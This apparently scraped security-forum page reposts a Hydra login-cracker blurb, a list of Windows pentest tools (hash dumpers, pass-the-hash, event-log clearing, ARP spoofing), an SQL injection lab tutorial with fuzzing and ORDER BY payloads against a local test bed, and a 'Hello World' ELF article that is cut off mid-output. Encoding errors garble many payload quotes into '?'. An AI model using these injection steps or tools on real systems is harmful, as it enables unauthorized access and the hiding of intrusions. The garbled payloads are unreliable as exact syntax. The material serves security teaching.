Nytro

Fastest Router Hacking With Hydra - Official Video Description: THC-Hydra A very fast network logon cracker which support many different services. INTRODUCTION ------------ Number one of the biggest security holes are passwords, as every password security study shows. This tool is a proof of concept code, to give researchers and security consultants the possiblity to show how easy it would be to gain unauthorized access from remote to a system. Currently this tool supports: AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP. However the module engine for new services is very easy so it won't take a long time until even more services are supported. Your help in writing, enhancing or fixing modules is highly appreciated!! Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Fastest Router Hacking With Hydra - Official Video

Windows Tools For Penetration Testing Most penetration testers are using either a Mac or a Linux-based platform in order to perform their penetration testing activities.However it is always a good practice to have and a Windows virtual machine with some tools ready to be used for the engagement.The reason for this is that although Windows cannot be used as a main platform for penetration testing some of the utilities and tools can still help us to extract information from our windows targets.So in this post we will see some of the tools that we can use in our windows system. HashCheck Shell Extension The HashCheck Shell Extension makes it easy for anyone to calculate and verify checksums and hashes from Windows Explorer. In addition to integrating file checksumming functionality into Windows, HashCheck can also create and verify SFV files (and other forms of checksum files, such as .md5 files). Netcat Netcat is often referred to as a “Swiss-army knife for TCP/IP”. Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor. Metasploit Framework The Metasploit Project is a computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. RealVNC Viewer Remote access software for desktop and mobile platforms. GetIf SNMP tool that allows you to collect information about SNMP devices. Cain & Abel Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. Wireshark Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development. PuTTY PuTTY is an SSH and telnet client for the Windows platform. Pass The Hash Toolkit The Pass-The-Hash Toolkit contains utilities to manipulate the Windows Logon Sessions mantained by the LSA (Local Security Authority) component. These tools allow you to list the current logon sessions with its corresponding NTLM credentials (e.g.: users remotely logged in thru Remote Desktop/Terminal Services), and also change in runtime the current username, domain name, and NTLM hashes. Cachedump Recovering Windows Password Cache Entries. Fport Identify unknown open ports and their associated applications. Nbtscan This is a command-line tool that scans for open NETBIOS nameservers on a local or remote TCP/IP network, and this is a first step in finding of open shares. Burp Suite Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities. Winfo Winfo uses null sessions to remotely try to retrieve lists of and information about user accounts, workstation/interdomain/server trust accounts, shares (also hidden), sessions, logged in users, and password/lockout policy, from Windows NT/2000/XP. It also identifies the built-in Administrator and Guest accounts, even if their names have been changed. ClearLogs ClearLogs clears the event log (Security, System or Application) that you specify. You run it from the Command Prompt, and it can also clear logs on a remote computer. SQLDict SQLdict is a dictionary attack tool for SQL Server. PMDump PMDump is a tool that lets you dump the memory contents of a process to a file without stopping the process. GrabItAll GrabItAll performs traffic redirection by sending spoofed ARP replies. It can redirect traffic from one computer to the attackers computer, or redirect traffic between two other computers through the attackers computer. In the last case you need to enable IP Forwarding which can be done with GrabItAll too. DumpUsers DumpUsers is able to dump account names and information even though RestrictAnonymous has been set to 1. BrowseList BrowseList retrieves the browse list. The output list contains computer names, and the roles they play in the network. For example you can see which are PDC, BDC, stand-alone servers and workstations. You can also see the system comments (which can be very interesting reading). Remoxec Remoxec executes a program using RPC (Task Scheduler) or DCOM (Windows Management Instrumentation). WMICracker Brute-force tool for Windows Management Instrumentation (WMI). Venom Venom is a tool to run dictionary password attacks against Windows accounts by using the Windows Management Instrumentation (WMI) service. This can be useful in those cases where the server service has been disabled. SMBAT The SMB Auditing Tool is a password auditing tool for the Windows-and the SMB-platform. It makes it possible to exploit the timeout architecture bug in Windows 2000/XP, making it extremly fast to guess passwords on these platforms. RPCScan RPCScan v2.03 is a Windows based detection and analysis utility that can quickly and accurately identify Microsoft operating systems that are vulnerable to the multiple buffer overflow vulnerabilities released in the MS03-026 and MS03-039 bulletins. LSASecretsDump LSASecretsDump is a small console application that extract the LSA secrets from the Registry, decrypt them, and dump them into the console window. SQLPing SQL Ping is a nice little command line enumerator that specifically looks for SQL servers and requires no authentication whatsoever. OAT The Oracle Auditing Tools is a toolkit that could be used to audit security within Oracle database servers. Pwdump7 Extract password hashes from local user accounts. PsTools The PsTools package provides a set of command line utilities that allow you to manage local and remote systems. Incognito Incognito is a tool for manipulating windows access tokens and is intended for use by penetration testers, security consultants and system administrators. DumpSec DumpSec is a security auditing program for Microsoft Windows® NT/XP/200x. It dumps the permissions (DACLs) and audit settings (SACLs) for the file system, registry, printers and shares in a concise, readable format, so that holes in system security are readily apparent. DumpSec also dumps user, group and replication information. X-Deep32 X-Deep/32 is an X Window Server for Windows NT/2000/9X/ME/XP that can be used to connect to host systems running UNIX, LINUX, IBM AIX etc. LC5 Windows password cracker. Ophcrack Ophcrack is a free Windows password cracker based on rainbow tables. SiVuS SiVus is the first publicly available vulnerability scanner for VoIP networks that use the SIP protocol. It provides powerful features to assess the security and robustness of VoIP implementations. Sursa: Windows Tools For Penetration Testing

SQL Injections: An Introduction Audi-1 January 07, 2013 According to the Open Web Application Security Project (OWASP), injection attacks are first on the list of the top 10 web vulnerabilities. Diving into these, SQL injections are responsible for a big chunk of this. Exploitation of SQL injections is trivial. This vulnerability is not just web related but can also occur in desktop applications that use SQL server backends. The detectability of these vulnerabilities depends on the complexity of the application in question. Most times, point-and-shoot tools fail to successfully detect these vulnerabilities. Sometimes there is difficulty in putting the desired conditions to successfully exploit the injections into these point-and-click tools, causing the vulnerability to go unnoticed. A generic solution to prevent these sorts of flaws from creeping in while programming is to sanitize all inputs and use proper encoding, furthermore using the white-list approach to allow only data which needs to be used by application. SQLI-LABS is an attempt to walk through the process of SQL injections in a dumb way. The focus is on understanding the core concepts, making it easy to be followed by people who are learning to break into the field of security and penetration testing. To help the learning process, a test bed has been prepared which can be followed along with this post. One can also follow the video explanations for each lesson for brief explanations about the topic. The test bed can be grabbed from https://github.com/Audi-1/sqli-labs. You can follow readme.txt for installation instructions or can watch the brief video. What are SQL injections? An SQL injection is a kind of injection vulnerability in which the attacker tries to inject arbitrary pieces of malicious data into the input fields of an application, which, when processed by the application, causes that data to be executed as a piece of code by the back end SQL server, thereby giving undesired results which the developer of the application did not anticipate. The backend server can be any SQL server (MySQL, MSSQL, ORACLE, POSTGRESS, to name a few) The ability of the attacker to execute code (SQL statements) through vulnerable input parameters empowers him to directly interact with the back end SQL server, thereby leveraging almost a complete compromise of system in most cases. What are different types of SQL injections? SQL injections can be classified and categorized in different ways, based on the type of data extraction channel, the response received from server, how server responses aid in leveraging the successful exploitation, impact point, etc. Based on the data extraction channel Inband or inline Out-of-band SQL injections that use the same communication channel as input to dump the information back are called inband or inline SQL Injections. This is one of the most common methods, readily explained on the Internet in different posts. For example, a query parameter, if injectable, leads to the dumping of info on the web page. Injections that use a secondary or different communication channel to dump the output of queries performed via the input channel are referred to as out-of-band SQL injections. For example, the injection is made to a web application and a secondary channel such as DNS queries is used to dump the data back to the attacker domain. Based on the response received from the server Error-based SQL injections Union query type. Double query Injections. Blind SQL Injections Boolean-based blind injections. Time based blind injections. Error-based SQL injections are primarily those in which the SQL server dumps some errors back to the user via the web application and this error aids in successful exploitation. In the image below, the yellow line displays the error. These will be discussed further in this post and in related posts to come. Blind SQL injections are those injections in which the backend database reacts to the input, but somehow the errors are concealed by the web application and not displayed to the end users. Or the output is not dumped directly to the screen. Therefore, the name “blind” comes from the fact that the injector is blindly injected using some calculated assumptions and tries. Based on how the input is treated in SQL query (what data type) String-based Numeric- or integer based Based on how the input parameter would be treated in the back end SQL query, an injection can be classified as string- or integer-based. Based on the degree/order of injections (where the impact happens) First-order injections. Second-order injections. The degree or the order of injection identifies the way in which the injection yields the output. If the injection directly delivers the result, it is considered to be a first-order injection, but if the injection input yields no successful result in extraction, but instead impacts some other result which the attacker can take advantage of on some other place/page, it is called a second-order injection. Consider second-order injections similar to stored XSS injections, where the input is stored in the application and later rendered on some other page, thereby impacting that page indirectly because of initial malicious input. Based on the injection point location Injection through user input form fields. Injection through cookies. Injection through server variables. (headers-based injections) Why does SQL injection happen? Generally when an application is communicating with the backend database, it does so in the form of queries with the help of an underlying database driver. This driver is dependent on the application platform being used and the type of backend database, such as MYSQL, MSSQL, DB2, or ORACLE. A generic login query would look something like this: `SELECT Column1, Column2,Column3 FROM table_name WHERE username=’$variable1? AND password=’$variable2?;` We can split this query into two parts, code section and the data section. The data section is the $variable1 and $variable2 and quotes are being used around the variable to define the string boundary. Let us try to walk through the process in a crude way. Say at the login form, the username entered is Admin and password is p@ssw0rd which is collected by application and values of $variable1 and $variable2 are placed at their respective locations in the query, making it something like this. `SELECT Column1, column2, Column3 FROM table_name WHERE username=’Admin’ AND password=’p@ssw0rd’;` Now the developer assumes that users of his application will always put a username and password combination to get a valid query for evaluation by database backend. What if the user is malicious and enters some characters which have some special meaning in the query? For example a single quote. So, instead of putting Admin, he puts Admin’, thereby causing an error thrown by the DB driver. Why? Because of the unpaired quote entered by the user breaking the application logic. We will discuss the process in detail. To summarize: Whenever an attacker is able to escape the data boundaries, he can append data which then gets interpreted as code by the DB Driver and is executed on the SQL backend, thereby causing SQL injection. ERROR-based SQL injections In general, all programming languages give developers a flexibility to debug and fix their applications by using some inbuilt error-handling functions/libraries. These could be some explicit function, classes, or methods that deliver friendly error messages so that the troubleshooting experience can be streamlined and detecting the part of code responsible for raising those exceptions can be easier. These functions should be controlled before an application goes to production because they can dump a lot of sensitive info about the application and underlying logic, thereby making it easy for a bad guy to exploit the application. Therefore, those applications where these error-handling functions are available to aid in gaining useful info about the application or in dumping the database info by means of SQL interaction are classified as error-based SQL Injections. Based on the way data is extracted using helpful errors, the error-based injections can be classified into two main types: Union-query type Double-query type Let’s discuss the process of SQLi in detail. To do so, let us consider Lessons 1 to 4. We will continue to explore the further lessons of Labs in coming posts. For the purpose of demonstration, I have installed the SQLI-LABS under the /var/www location on my Backtrack installation. Download and follow the install instructions to set it up to follow along. A methodological approach is always helpful in understanding the underlying logic. The major process is as follows: Enumerate the application behavior Fuzz the application with bogus data with the goal of crashing the application Try to control the injection point by guessing the query used in the backend Extract the data from the back end database Enough theory, time for some action. ENUMERATION: Let us start with enumeration of the applications. Lessons 1 to 4 look almost identical. When we load the page for Less-1, it asks us to input ID as a GET parameter, which should be a numeric value. Providing the ID as a numeric value, we see a specific username and password on screen when the value of ID is between 1 through 14. For any other value, we see nothing being displayed on screen. ANALYSIS of ENUMERATION id=15 => No output on screen. ID=1 => Login name= Dumb, Password=Dumb ID=2 => Login name= Angelina, Password=I-kill-you ID=3 => Login name= Dummy, Password=p@ssw0rd ID=4 => Login name= secure, Password=crappy ID=5 => Login name= stupid, Password=stupidity ID=6 => Login name= superman, Password=genious ID=7 => Login name= batman, Password=mob!le ID=8 => Login name= admin, Password=admin ID=9 => Login name= admin1, Password=admin1 ID=10 => Login name= admin2, Password=admin2 ID=11 => Login name= admin3, Password=admin3 ID=12 => Login name= dhakkan, Password=Dumbo ID=13 => Login name= admin4, Password=admin4 ID=14 => Login name= admin5, Password=admin5 ID=15 => No output on screen. ID=20 => No output on screen. ID=100 => No output on screen. Result of Enumeration: The database seems to have 14 records in the table and for any non-existent value ID it returns an empty set. FUZZING: Generally the developer of the application assumed that the user would input integer values. After we have enumerated the application work flow, we try to fuzz all input points of the application. So what exactly is Fuzz? It is a process for supplying arbitrary dumb patterns as input with the objective to see application behavior and try to find the discrepancies in the responses. The discrepancies indicate the possibility of vulnerability. We will fuzz all the four lessons together one by one. Below are some arbitrary inputs which we can add, append and use for purpose of detecting basic error based SQLi: ‘ “ \ ; %00 ) ( aaa Integer or string test: Because the input parameter seems to be integer value, let us try to input a string value for ID parameter and observe the behavior. Less-1 http://localhost/sqli-labs/Less-1/?id=asdf Less-2 http://localhost/sqli-labs/Less-2/?id=asdf Less-3 http://localhost/sqli-labs/Less-3/?id=asdf Less-4 http://localhost/sqli-labs/Less-4/?id=asdf Result of Integer and String Test: We see that Less-1, Less-3, and Less-4 respond by returning the empty set, whereas Less-2 returns a different behavior; it displays a MySQL error message on screen. From very basic programming knowhow, we know that a string parameter is always wrapped in single quotes or double quotes, whereas integers are used as is. Therefore we can assume that Less-1, -3, and -4 are using some sort of quotes to wrap around the user input. They consider the string entered as a non-existent value in the database and therefore respond with the empty set. Less-2 is producing a MySQL alert, meaning that there are no quotes used around the input parameter, therefore integer values work fine in a query but strings cause an error. Therefore we can deduce that Less-1, Less-2, and Less-3 are string-based injections and Less-2 is an integer-based injection. Fuzzing continued: Now let us further take the fuzz characters and try them against Less-1 through -4 one by one. Less-1 http://localhost/sqli-labs/Less-1/?id=1? Less-2 http://localhost/sqli-labs/Less-2/?id=1‘ Less-3 http://localhost/sqli-labs/Less-3/?id=1‘ All three produce a similar kind of error message with a very minute difference. Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”1” LIMIT 0,1? at line 1 And Less-4 does not produce any alert with the injection of a single quote. http://localhost/sqli-labs/Less-4/?id=1‘ Trying the same exercise with a double quote injection, we observe that this time only Less-4 crashes the application and Less-1, Less-2, and Less-3 do not crash it anymore. Therefore, from the above tests, we have discovered that the applications Less-1, Less-2, and Less-3 are reactive to a single-quote injection and Less-4 is to a double-quote injection. Time to discover the underlying query being used by applications by using info gained above. We know that Less-1, Less-3, and Less-4 are string-based and Less-2 is numeric. Let us confirm this further by injecting a backslash, which is an escape character to print characters which have special meaning in SQL (for example, to print a ‘ we need to write it as \’ so the quote does not get evaluated and dumped as another character). Appending ID=1\ yields the following output: For Less-1 Because we input 1\, let’s look at the part of error dumped on the screen containing 1\, which is near ‘ ’1\’ LIMIT 0,1? at line 1. We observe that as our input was 1\, a single quote is visible after that, indicating that single quotes are used as a wrapper for the strings. Let’s take Less-2 and try the same. Our input is same but the output has a minor change to the Less-1, near ‘ ’1\ LIMIT 0,1? at line 1. After our input 1\ there are no quotes, again proving that Less-2 is an integer-based injection and does not need any quotes to break the query. Still confused? Let us do the same test with Less-3 and Less-4 and it will get clearer as we progress. Let us do the same test with Less-3: The error message is near ‘ ’1\’) LIMIT 0,1? at line 1. In this lesson, with the same input of 1\, we see ‘) after our parenthesis, indicating that the developer of the application has wrapped the variable inside parentheses (‘ variable’). Let’s do the same with Less-4: Error message is near ‘ “1\”) LIMIT 0,1? at line 1. In this lesson, with same input of 1\, we see “) after our parenthesis indicating that the developer of the application has wrapped variable inside parentheses (“variable”). Building up the query being used behind the scene in the applications: Less-1: SELECT * FROM TABLE_NAME WHERE ID=’$ID’ LIMIT 0,1 Less-2: SELECT * FROM TABLE_NAME WHERE ID=$ID LIMIT 0,1 Less-3: SELECT * FROM TABLE_NAME WHERE ID=(‘$ID’) LIMIT 0,1 Less-4: SELECT * FROM TABLE_NAME WHERE ID=(“$ID”) LIMIT 0,1 COMMENTING OUT QUERY Until now, we have been able to detect the injection flaw, and able to guess a pseudo query with details on what is being used as a string delimiter or wrapper around the variable. One thing we need to understand is that, during the injection, we can only control the variable but not the delimiters used around it; therefore as soon as we inject an extra delimiter, it induces a syntax error. For a successful injection, we should close the open delimiter wrapped around the variable in the query, thereby making it possible for us to escape the string/integer boundary and execute SQL statements and also be able to handle the closing delimiter around the variable, which becomes stale. This can be done in two ways. One way is by commenting out the rest of query, and the second way is by adding an extra delimiter with extra values to make the query syntactically correct. Let us take an example: Less-1: SELECT * FROM TABLE_NAME WHERE ID=’ $ID ‘ LIMIT 0,1 In place of $ID, we put value of 1?, then the query becomes something like SELECT * FROM TABLE_NAME WHERE ID=’ 1? ‘ LIMIT 0,1 Now, this query is syntactically incorrect and needs to be fixed for execution. We found and confirmed that, by adding an extra quote for Less-1, we can successfully escape the string boundary, but we need to fix the extra ‘ which is there as part of original query. Way one: We can use SQL comments to fix the syntax. MySQL uses three types of comments: –+, # , /* */, so our injection can be 1? –+ or 1? #. So the query effectively becomes SELECT * FROM TABLE_NAME WHERE ID=’ 1?–+ ‘ LIMIT 0,1 SELECT * FROM TABLE_NAME WHERE ID=’ 1? # ‘ LIMIT 0,1 Complete URL with injection is: http://localhost/sqli-labs/Less-1/?id=1?–+ http://localhost/sqli-labs/Less-1/?id=1? %23 (NOTE: %23 is url-encoded value for #) For Lesson 2, we do not need any extra quotes to escape and inject queries as there are no quotes in the first place, therefore a simple commenting out should be fine. http://localhost/sqli-labs/Less-2/?id=1–+ http://localhost/sqli-labs/Less-2/?id=1 %23 (NOTE: %23 is url-encoded value for #) So the query effectively becomes SELECT * FROM TABLE_NAME WHERE ID= 1?–+ LIMIT 0,1 SELECT * FROM TABLE_NAME WHERE ID= 1? # LIMIT 0,1 Let us now look at the Less-3 and Less-4. The query for Less-3 we deduced earlier was: SELECT * FROM TABLE_NAME WHERE ID=(‘$ID’) LIMIT 0,1 Therefore, to get a working query in this case, we need to first inject ‘) as discussed above to close the initial delimiter and then comment out rest of the query. SELECT * FROM TABLE_NAME WHERE ID=(‘ 1?) –+ ‘) LIMIT 0,1 SELECT * FROM TABLE_NAME WHERE ID=(‘ 1?) # ‘) LIMIT 0,1 The query for Less-4 we deduced earlier was: SELECT * FROM TABLE_NAME WHERE ID=(“$ID”) LIMIT 0,1 Therefore, to get a working query in this case, we need to first inject ‘) as discussed above to close the initial delimiter and then comment out rest of the query. SELECT * FROM TABLE_NAME WHERE ID=(” 1?) –+ “) LIMIT 0,1 SELECT * FROM TABLE_NAME WHERE ID=(” 1?) # “) LIMIT 0,1 Injection: 1?) –+ Injection: 1?) %23 (NOTE: %23 is URLENCODE for #) Injection: 1?) –+ Injection: 1?) %23 (NOTE: %23 is URLENCODE for #) Once we are in this position, having fixed the query after successful injection, we can inject the code in between the delimiter and the comments we injected. FINDING COLUMNS USED BY DEVELOPER IN QUERIES As we saw during the enumeration phase, the application is interacting with the database and displaying some info on the web pages. Therefore we will be using UNION statements to dump the database info. A constraint to the use of the union statements is that the columns on both sides of union should be the same; therefore our last hurdle before we get something out from the database is to know number of columns used by developer in his query. To do this we use a SQL Keyword “ORDER BY”. When we use ORDER BY in a query, the result set is arranged as per the selection of ORDER BY clause. If the column is not valid, we get an error. Therefore in our injections, we start to add ORDER BY 1, ORDER BY 2 , ORDER BY 3………… and try to observe the result. Injection: 1? ORDER BY 1 –+ => No Error. Injection: 1? ORDER BY 2 –+ => No Error. Injection: 1? ORDER BY 3 –+ => No Error. Injection: 1? ORDER BY 4 –+ => Error – Unknown column ’4? in ‘order clause’, indicating we have 3 columns. For Lesson2: Injection: 1 ORDER BY 1 –+ => No Error. Injection: 1 ORDER BY 2–+ => No Error. Injection: 1 ORDER BY 3 –+ => No Error. Injection: 1 ORDER BY 4 –+ => Error – Unknown column ’4? in ‘order clause’, indicating we have 3 columns. For Lesson3 Injection: 1?) ORDER BY 1 –+ => No Error. Injection: 1?) ORDER BY 2–+ => No Error. Injection: 1?) ORDER BY 3 –+ => No Error. Injection: 1?) ORDER BY 4 –+ => Error – Unknown column ’4? in ‘order clause’, indicating we have 3 columns. For Lesson4 Injection: 1?) ORDER BY 1 –+ => No Error. Injection: 1?) ORDER BY 2–+ => No Error. Injection: 1?) ORDER BY 3 –+ => No Error. Injection: 1?) ORDER BY 4 –+ => Error – Unknown column ’4? in ‘order clause’, indicating we have 3 columns. Once we know the number of columns in the queries, we can just go ahead and dump the databases and data of our choice. We will continue further in the next part of this series. You can also refer to the video postings about the same topic from the following link: Sursa: InfoSec Institute Resources – SQL Injections: An Introduction

Sfinte cacat Cum sa faci un program ca asta: 1. Google 2. Surse Bisual Basic 6 3. Copy/Paste in VB6 4. Cateva butoane 5. Gata multi-shit Hy -1 - 0 RST

Hello World: C, Assembly, Object File and Executable Dejan Lukan January 07, 2013 Introduction Summary: In this article we’ll take a look at the C program that prints “Hello World!” to the screen, which we’ll assemble and compile. Then we’ll compare the results and try to present what’s happening beneath the curtains. Specifically, we will look at which sections are present in the transformation chain: from C code, to assembly code, to object file, to executable. Hello World Program: The Assembly First we need to write the hello world C program, which can be seen below: #include <stdio.h> int main() { printf("Hello World!"); return 0; } It’s a very simple program that doesn’t actually do anything; we intentionally kept it this simple, so we will be able to focus on the bigger picture and not tons of code. We then need to compile the program to obtain the assembly code – we don’t want to do anything else right now. To do that we can use the -S option passed to the gcc program, which takes the source code of the program and generates the assembly instructions. We also want the masm Intel assembly source code and not some other format. We can achieve that by passing the -masm=Intel to the gcc program. If we’re on the 64-bit operating system, we also want to compile the program as 32-bit, which we can achieve by passing the -m32 argument to the gcc program. The whole gcc command that we’re using can be seen in the output below: # gcc -m32 -masm=intel -S hello.c -o hello.s This command effectively takes the hello.c program and compiles it as 32-bit program into assembly instructions that are saved into the hello.s file. The hello.s file now looks like presented below: .file "hello.c" .intel_syntax noprefix .section .rodata .LC0: .string "Hello World!" .text .globl main .type main, @function main: push ebp mov ebp, esp and esp, -16 sub esp, 16 mov eax, OFFSET FLAT:.LC0 mov DWORD PTR [esp], eax call printf mov eax, 0 leave ret .size main, .-main .ident "GCC: (Gentoo 4.5.4 p1.0, pie-0.4.7) 4.5.4" .section .note.GNU-stack,"",@progbits The .file directive states the original source file name that is normally used by debuggers. The .intel_syntax line specifies that we’re using intel sytax assembly and not AT&T syntax. Afterwards we’re defining the .rodata section, which is used for read-only data variables. In our case the .rodata section contains only the zero terminated string “Hello World!” that can be accessed with the LC0 variable. Then we’re defining the .text section, which is used for the code of the program. First we must define the main function (notice the .type main,@function instruction), which is globally visible (notice the .globl main instruction). From the main: label till the ret instruction is the actual code of the program. That code first initializes the stack by pushing the value of the register EBP to the stack, moving the value of register ESP to EBP. The “and esp,-16? is used for optimization because some operations can be performed faster if the stack pointer address is in a multiple of 16 bytes. That instruction is put in there because by default, gcc uses the optimization flag -O2. Then we’re subtracting 16 bytes from the current ESP stack pointer register for local variables. Next, the address to the LC0 (our “Hello World!” string) is read into the register eax and moved to the top of the stack, which is the first and only parameter to the printf function that is called right after. The printf function prints that string on the screen and returns to the caller, which takes care of the stack and returns. The .size instruction sets the size of the main function. The .-main holds the exact size of the function main, which is written to the object file. The .ident instruction saves the ” GCC: (Gentoo 4.5.4 p1.0, pie-0.4.7) 4.5.4? string to the object file in order to save the information about the compiler which was used to compile the executable. Hello World Program: The Object File We’ve seen the assembly code that was generated by the gcc directly from the corresponding C source code. But without the actual assembler and linker we can’t run the executable. To assemble the executable into the object file, we must use the -c option with the gcc compiler, which only assembles/compiles the source file, but does not actually link it. To obtain the object file from the assembly code we need to run the command below: # gcc -m32 -masm=intel -c hello.s -o hello.o # file hello.o hello.o: ELF 32-bit LSB relocatable, Intel 80386, version 1 (SYSV), not stripped We can see that the hello.o is the object file that is actually an ELF 32-bit executable, which is not linked yet. If we want to run the executable, it will fail as noted below: # chmod +x hello.o # ./hello.o bash: ./hello.o: cannot execute binary file We can read the contents of the object file with the readelf program as follows: # readelf -a hello.o ELF Header: Magic: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 Class: ELF32 Data: 2's complement, little endian Version: 1 (current) OS/ABI: UNIX - System V ABI Version: 0 Type: REL (Relocatable file) Machine: Intel 80386 Version: 0x1 Entry point address: 0x0 Start of program headers: 0 (bytes into file) Start of section headers: 224 (bytes into file) Flags: 0x0 Size of this header: 52 (bytes) Size of program headers: 0 (bytes) Number of program headers: 0 Size of section headers: 40 (bytes) Number of section headers: 11 Section header string table index: 8 Section Headers: [Nr] Name Type Addr Off Size ES Flg Lk Inf Al [ 0] NULL 00000000 000000 000000 00 0 0 0 [ 1] .text PROGBITS 00000000 000034 00001d 00 AX 0 0 4 [ 2] .rel.text REL 00000000 000350 000010 08 9 1 4 [ 3] .data PROGBITS 00000000 000054 000000 00 WA 0 0 4 [ 4] .bss NOBITS 00000000 000054 000000 00 WA 0 0 4 [ 5] .rodata PROGBITS 00000000 000054 00000d 00 A 0 0 1 [ 6] .comment PROGBITS 00000000 000061 00002b 01 MS 0 0 1 [ 7] .note.GNU-stack PROGBITS 00000000 00008c 000000 00 0 0 1 [ 8] .shstrtab STRTAB 00000000 00008c 000051 00 0 0 1 [ 9] .symtab SYMTAB 00000000 000298 0000a0 10 10 8 4 [10] .strtab STRTAB 00000000 000338 000015 00 0 0 1 Key to Flags: W (write), A (alloc), X (execute), M (merge), S (strings) I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown) O (extra OS processing required) o (OS specific), p (processor specific) There are no section groups in this file. There are no program headers in this file. Relocation section '.rel.text' at offset 0x350 contains 2 entries: Offset Info Type Sym.Value Sym. Name 0000000a 00000501 R_386_32 00000000 .rodata 00000012 00000902 R_386_PC32 00000000 printf There are no unwind sections in this file. Symbol table '.symtab' contains 10 entries: Num: Value Size Type Bind Vis Ndx Name 0: 00000000 0 NOTYPE LOCAL DEFAULT UND 1: 00000000 0 FILE LOCAL DEFAULT ABS hello.c 2: 00000000 0 SECTION LOCAL DEFAULT 1 3: 00000000 0 SECTION LOCAL DEFAULT 3 4: 00000000 0 SECTION LOCAL DEFAULT 4 5: 00000000 0 SECTION LOCAL DEFAULT 5 6: 00000000 0 SECTION LOCAL DEFAULT 7 7: 00000000 0 SECTION LOCAL DEFAULT 6 8: 00000000 29 FUNC GLOBAL DEFAULT 1 main 9: 00000000 0 NOTYPE GLOBAL DEFAULT UND printf No version information found in this file. We can see that the file is an ELF object file that has 11 section headers. The first section header is null. The second section header is .text, which contains the executable instructions of the program. The .rel.text holds the relocation information of the .text section. The relocation entries must be present, as our program instructions call external functions, whose function pointers must be updated upon the program execution. In the output above, we can see that the .rel.text holds two relocation entries: the .rodata and printf. The .data section holds the initialized data, while the .bss section holds uninitialized data that the program uses. The .rodata holds read-only data that can be used by the program; this is where our “Hello World!” string is stored. The .comment section holds version control information and the .note.GNU-stack holds some additional data that I won’t describe here. The .shstrtab holds section names, while the .strtab holds section strings and the .symtab holds the symbol table. We can quickly figure out that in the assembly code there was only the .rodata and .text sections defined, but when we translated the assembly code into the object file, quite some sections were added to the file. Those sections are needed to successfully link the executable and properly execute the program. Hello World Program: The Executable The last step is to actually link the object file to make an executable. To do that, we must execute the command below: # gcc -m32 hello.o -o hello # ./hello Hello World! We’ve linked the object file hello.o into the executable ./hello and executed it. Upon execution of the program, the program outputted the “Hello World!” string as it should. If we take a look at the ELF again, we can see that there is a lot of other information and file sections added to the executable, which can be seen below: $ readelf -a hello ELF Header: Magic: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 Class: ELF32 Data: 2's complement, little endian Version: 1 (current) OS/ABI: UNIX - System V ABI Version: 0 Type: EXEC (Executable file) Machine: Intel 80386 Version: 0x1 Entry point address: 0x8048330 Start of program headers: 52 (bytes into file) Start of section headers: 4392 (bytes into file) Flags: 0x0 Size of this header: 52 (bytes) Size of program headers: 32 (bytes) Number of program headers: 10 Size of section headers: 40 (bytes) Number of section headers: 30 Section header string table index: 27 Section Headers: [Nr] Name Type Addr Off Size ES Flg Lk Inf Al [ 0] NULL 00000000 000000 000000 00 0 0 0 [ 1] .interp PROGBITS 08048174 000174 000013 00 A 0 0 1 [ 2] .note.ABI-tag NOTE 08048188 000188 000020 00 A 0 0 4 [ 3] .hash HASH 080481a8 0001a8 000028 04 A 5 0 4 [ 4] .gnu.hash GNU_HASH 080481d0 0001d0 000020 04 A 5 0 4 [ 5] .dynsym DYNSYM 080481f0 0001f0 000050 10 A 6 1 4 [ 6] .dynstr STRTAB 08048240 000240 00004c 00 A 0 0 1 [ 7] .gnu.version VERSYM 0804828c 00028c 00000a 02 A 5 0 2 [ 8] .gnu.version_r VERNEED 08048298 000298 000020 00 A 6 1 4 [ 9] .rel.dyn REL 080482b8 0002b8 000008 08 A 5 0 4 [10] .rel.plt REL 080482c0 0002c0 000018 08 A 5 12 4 [11] .init PROGBITS 080482d8 0002d8 000017 00 AX 0 0 4 [12] .plt PROGBITS 080482f0 0002f0 000040 04 AX 0 0 16 [13] .text PROGBITS 08048330 000330 00019c 00 AX 0 0 16 [14] .fini PROGBITS 080484cc 0004cc 00001c 00 AX 0 0 4 [15] .rodata PROGBITS 080484e8 0004e8 000015 00 A 0 0 4 [16] .eh_frame_hdr PROGBITS 08048500 000500 000014 00 A 0 0 4 [17] .eh_frame PROGBITS 08048514 000514 000040 00 A 0 0 4 [18] .ctors PROGBITS 08049f0c 000f0c 000008 00 WA 0 0 4 [19] .dtors PROGBITS 08049f14 000f14 000008 00 WA 0 0 4 [20] .jcr PROGBITS 08049f1c 000f1c 000004 00 WA 0 0 4 [21] .dynamic DYNAMIC 08049f20 000f20 0000d0 08 WA 6 0 4 [22] .got PROGBITS 08049ff0 000ff0 000004 04 WA 0 0 4 [23] .got.plt PROGBITS 08049ff4 000ff4 000018 04 WA 0 0 4 [24] .data PROGBITS 0804a00c 00100c 000008 00 WA 0 0 4 [25] .bss NOBITS 0804a014 001014 000008 00 WA 0 0 4 [26] 